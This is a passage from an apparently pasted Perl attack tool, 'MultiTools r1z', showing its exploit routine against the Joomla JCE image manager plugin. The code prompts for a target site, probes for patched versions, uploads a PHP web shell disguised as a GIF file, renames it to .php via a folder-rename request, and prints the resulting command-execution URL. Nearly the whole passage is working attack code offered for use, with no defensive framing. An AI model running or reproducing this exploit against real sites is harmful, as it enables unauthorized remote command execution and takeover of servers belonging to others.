  1425. print color("green"), "Write your target (without http://) : ";
  1426. my $fuck = <>;
  1427. chomp $fuck;
  1428. $TARGET = $fuck;
  1429. $PORT   = "80";
  1430. $SCRIPT = "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20";
  1431. $SHELL  = "/images/stories/0day.php?cmd=";
  1432. $HTTP   = "http://";
  1433.  
  1434. $header1G = "GET $SCRIPT HTTP/1.1";
  1435. $header1H = "HEAD /images/stories/0day.php HTTP/1.1";
  1436. $header1P = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1";
  1437. $header1P2 = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1";
  1438. $header2 = "Host: $TARGET";
  1439. $header3 = "User-Agent: BOT/0.1 (BOT for JCE)";
  1440. $header4 = "Content-Type: multipart/form-data; boundary=---------------------------41184676334";
  1441. $header5 = "Content-Length: 769";
  1442. $header6 = "-----------------------------41184676334";
  1443. $header7 = 'Content-Disposition: form-data; name="upload-dir"';
  1444. $header8 = '/';
  1445. $header9 = 'Content-Disposition: form-data; name="Filedata"; filename=""';
  1446. $header10 = 'Content-Type: application/octet-stream';
  1447. $header11 = 'Content-Disposition: form-data; name="upload-overwrite"';
  1448. $header12 = "0";
  1449. $header13 = 'Content-Disposition: form-data; name="Filedata"; filename="0day.gif"';
  1450. $header14 = 'Content-Type: image/gif';
  1451. $header15 = 'GIF89aG';
  1452. $header16 = "<? system($_GET['cmd']);exit; ?>";
  1453. $header17 = 'Content-Disposition: form-data; name="upload-name"';
  1454. $header18 = '0day';
  1455. $header19 = 'Content-Disposition: form-data; name="action"';
  1456. $header20 = 'upload';
  1457. $header21 = "-----------------------------41184676334--";
  1458. $header22 = 'X-Request: JSON';
  1459. $header23 = 'Content-Type: application/x-www-form-urlencoded; charset=utf-8';
  1460. $header25 = 'json={"fn":"folderRename","args":["/0day.gif","0day.php"]}';
  1461. $header24 = "Content-Length: ".length($header25)."";
  1462.  
  1463. ############################################### Packet 1 --> Checking Exploitability #########################################################
  1464. print "\n[*] Checking Exploitability ...\n\n";
  1465. $pageURL=$TARGET.$SCRIPT;
  1466. $simplePage=get($pageURL);
  1467. @arr = ("2.0.11</title","2.0.12</title","2.0.13</title","2.0.14</title","2.0.15</title","1.5.7.10</title","1.5.7.11</title","1.5.7.12</title","1.5.7.13</title","1.5.7.14</title");
  1468. while (($count!=10) && ($die != 1)) {
  1469.     foreach $arr(@arr){
  1470.         if ($simplePage =~ m/$arr/) {
  1471.             print "\n[*] Target patched.\n\n";
  1472.             $die = 1;
  1473.         } else {
  1474.             $count++;
  1475.                 }
  1476.         }
  1477.     }
  1478.  if ($count==5) {print "[*] Target is exploitable.\n\n"};
  1479. ############################################### Packet 2 --> Uploading shell as a gif file #########################################################
  1480. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
  1481. || die "Can't connect to $TARGET";
  1482. print "[*] Trying to upload 0day.gif ...\n\n";
  1483. print $remote "$header1P\n$header2\n$header3\n$header4\n$header5\n\n$header6\n$header7\n\n$header8\n$header6\n$header9\n$header10\n\n\n$header6\n$header11\n\n$header12\n$header6\n$header13\n$header14\n\n$header15\n$header16\n$header6\n$header17\n\n$header18\n$header6\n$header19\n\n$header20\n$header21\n\n";
  1484. ############################################### Packet 3 --> Change Extension from .gif to .php #########################################################
  1485. print "[*] Trying to change extension from .gif to .php ...\n\n";
  1486. $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")
  1487. || die "Can't connect to $TARGET";
  1488. print $remote "$header1P2\n$header2\n$header3\n$header23\n$header22\n$header24\n\n$header25\n\n";
  1489. ############################################### Packet 4 --> Check for successfully uploaded #########################################################
  1490. $shellurl=$TARGET.$SHELL;
  1491. $output=get($shellurl);
  1492. while ($output = <$remote> ) {
  1493. if ($output =~ /200 OK/) {
  1494. print "[+] 0day.php was successfully uploaded\n\n";
  1495. print "[+] Path:".$TARGET.$SHELL."id\n";
  1496. }}
  1497.  
  1498. }
  1499. }

Reply to "MultiTools r1z <= 1.0.1 beta"

Here you can reply to the paste above